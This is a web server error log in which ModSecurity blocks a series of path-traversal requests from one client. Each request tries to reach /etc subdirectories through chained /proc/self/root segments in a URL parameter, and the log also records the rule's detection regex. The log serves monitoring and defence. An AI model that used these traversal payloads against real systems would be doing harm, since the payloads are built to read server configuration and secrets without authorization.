[Mon Mar 16 12:07:07.416378 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:35842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcm7ABkC4fWIHEf8HndQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:12.145826 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:35852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcoAlT9VtDQc7bgUysjQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:14.439061 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:45336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcopqj1wV0Si-OkefpUQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:15.758971 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:45348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcowlT9VtDQc7bgUysjgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:16.919961 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:45352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcpJqj1wV0Si-OkefpUwAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:18.249097 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:45356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcpglT9VtDQc7bgUyskAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:19.434979 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:45360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcpwlT9VtDQc7bgUyskgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:22.797956 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:46292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcqo6lpbStxTqkSktpVAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:30.611985 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:46308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcsrABkC4fWIHEf8HngAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:31.935704 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:51702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcsxXjF1vJNtV6CWrzJAAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:37.352960 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:51718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcuY6lpbStxTqkSktpYAAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:39.963196 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:51732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcu9SswJuvopo3lOha1gAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:41.290623 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:41964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcvXjZBu2q05ozVU9T3gAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:47.980597 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:41976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcwwlT9VtDQc7bgUysowAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:49.239977 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:41980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcxbysWC90G-1nBrBCagAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:51.863983 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:58814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcx3bQATo66fKoS7xL5QAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:12.343841 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:58824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc23jZBu2q05ozVU9UDAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:16.626120 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:47494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc4HjZBu2q05ozVU9UEwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:24.743206 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:47506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc6AlT9VtDQc7bgUysqwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:26.089823 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:37806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc6rABkC4fWIHEf8HngQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:28.275114 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:37816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc7HbQATo66fKoS7xL6gAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:29.554945 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:37832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc7bABkC4fWIHEf8HnggAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
